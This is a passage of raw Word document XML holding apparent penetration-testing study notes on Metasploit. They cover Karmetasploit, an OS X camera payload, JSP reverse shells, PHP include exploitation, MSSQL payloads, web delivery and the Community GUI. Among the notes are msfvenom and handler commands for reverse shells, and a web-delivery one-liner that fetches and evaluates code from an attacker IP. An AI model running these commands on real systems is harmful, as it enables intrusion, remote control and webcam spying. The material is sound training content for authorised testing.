      </w:pPr>
      <w:r>
        <w:t>Karmetasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2FB06B" w14:textId="34DBA769" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fake access points, capture passwords, harvest data, and conduct browser attacks against clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEAB1E7" w14:textId="20968453" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001030C6">
        <w:t>https://www.offensive-security.com/metasploit-unleashed/karmetasploit-configuration/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94D73E" w14:textId="4EDCC957" w:rsidR="001030C6" w:rsidRDefault="0005276B" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="001030C6" w:rsidRPr="00BF2DF8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/karmetasploit-action/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D460878" w14:textId="1916FF0D" w:rsidR="001030C6" w:rsidRDefault="0005276B" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="001030C6" w:rsidRPr="00BF2DF8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.offensive-security.com/metasploit-unleashed/karmetasploit-attack-analysis/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0984FEAE" w14:textId="69A19085" w:rsidR="001030C6" w:rsidRDefault="001030C6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MSF VS OS X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76321D9F" w14:textId="0EAC0A99" w:rsidR="001030C6" w:rsidRDefault="006579F6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Take advantage of Mac computer camera features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791F5AF5" w14:textId="600B7394" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006579F6">
        <w:t>msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o /tmp/osxt2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325DD7E6" w14:textId="4EE4D612" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="001030C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF5406A" w14:textId="77C8FBE6" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD osx/x86/isight/bind_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74749047" w14:textId="0A7BD9F0" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File-Upload Backdoors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C64746C" w14:textId="264DE76C" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>generate and handle Java based shells to gain remote access to a system via arbitrary file uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B3EC49" w14:textId="54ADB882" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006579F6">
        <w:t>msfvenom -a x86 --platform windows -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 -f raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C46FE" w14:textId="3DCC30CD" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D78FAF8" w14:textId="2176FC39" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD java/jsp_shell_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6E022" w14:textId="7CBF5C5D" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File Inclusion Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5447594A" w14:textId="79B02C4B" w:rsidR="006579F6" w:rsidRDefault="006579F6" w:rsidP="006579F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>RFI and LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A044C2" w14:textId="345FBCBF" w:rsidR="00BC2EEA" w:rsidRDefault="00BC2EEA" w:rsidP="00BC2EEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>PHP Meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8C706" w14:textId="042FE4B9" w:rsidR="00BC2EEA" w:rsidRDefault="00E21954" w:rsidP="00BC2EEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>abuse of php_include module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C663033" w14:textId="7C55CBA9" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00BC2EEA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookie PHP Session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0273202A" w14:textId="380C59EE" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Cookie Manager+ add-on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2D45B" w14:textId="0AA56171" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Module Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0597E66C" w14:textId="3874FFFA" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/unix/webapp/php_include</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8CF455" w14:textId="1173B100" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set exact path to vulnerable inclusion point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5A062C" w14:textId="0C73611E" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>place the text XXpathXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416184BB" w14:textId="480730BE" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PHPURI /?page=XXpathXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E5CFC0" w14:textId="07F13B51" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PATH /path/to/inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7D4740" w14:textId="519F8606" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Building A Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE57F1A" w14:textId="2527B2D0" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payloads Through MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F039EC4" w14:textId="42402480" w:rsidR="00E21954" w:rsidRDefault="00E21954" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Microsoft SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C51898" w14:textId="4AC4CADD" w:rsidR="00E21954" w:rsidRDefault="0015358A" w:rsidP="00E21954">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>UDP Port 1434 and executing dictionary attacks for guessing sa password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA76A88" w14:textId="4FB04463" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use windows/msswl/mssql_payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C7603" w14:textId="59BCD282" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE49926" w14:textId="5814C342" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9395F1" w14:textId="46D6D586" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>creates a server on attacking machine which hosts a payload which is executed when victim visits the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACA4BEC" w14:textId="405F1AB3" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>remote command execution is an effective attack vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B90156E" w14:textId="45855480" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>useful when attacker has partial system control but not full shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27077CFB" w14:textId="3BF7E90C" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in area that can execute RCE on a web page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B447C1" w14:textId="50426C93" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ping, telnet, or call the host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C2D6E" w14:textId="07964723" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B33CA4E" w14:textId="2A0E4A15" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>use exploit/multi/script/web_delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013CCC1E" w14:textId="3DAC356F" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set TARGET 1 (this must be set before payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CD1E5" w14:textId="128AB440" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>set PAYLOAD php/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E31B551" w14:textId="5E65B2BC" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>run given output command on victim in RCE input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86B441" w14:textId="27E6E8BD" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="0015358A">
        <w:t>php -d allow_url_fopen=true -r</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0015358A">
        <w:t>"eval(file_get_contents('http://192.168.80.128:8080/alK3t3tt'));"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B6FDA" w14:textId="230D7C7F" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>in attacker, interact with shell via sessions -i command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576DD386" w14:textId="0EBD0543" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA3050" w14:textId="3077FC79" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061D6D93" w14:textId="7229268A" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB88088" w14:textId="3E10F08E" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9461D" w14:textId="64692CCF" w:rsidR="0015358A" w:rsidRDefault="0015358A" w:rsidP="0015358A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>METASPLOIT GUIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8E9E0" w14:textId="05ED23FF" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758A8F5A" w14:textId="157DD30A" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>map out network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715E86C" w14:textId="75CE65C4" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>integrate with nessus, nmap, nexpose, etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2315CE" w14:textId="1423E4BB" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>determine correct exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400AA04B" w14:textId="6D6FCB36" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>verify remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3DA6A" w14:textId="3498A036" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Activation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E470D2F" w14:textId="48FEFA84" w:rsidR="00975DDB" w:rsidRDefault="0005276B" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00975DDB" w:rsidRPr="003935AB">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:3790</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2B690039" w14:textId="054AA618" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>fill out info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD290D5" w14:textId="00B311D8" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>get product key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C04D7A" w14:textId="47D02C64" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>register with R7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1843CE0D" w14:textId="2231DF91" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Community Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5A8DEC" w14:textId="1D42BCF1" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Project – Create New Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245729C4" w14:textId="10FD6695" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6455282F" w14:textId="68DF8975" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>confirm IP addr range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9343B" w14:textId="4BBE30EC" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>configure advanced options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A67B18A" w14:textId="14CC203D" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Launch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FD92FB" w14:textId="5E9DBDC9" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6486C29A" w14:textId="507A041E" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FCD80C" w14:textId="72A2CBA4" w:rsidR="00975DDB" w:rsidRDefault="00975DDB" w:rsidP="00975DDB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>click on host or IP addr</w:t>
      </w:r>
    </w:p>
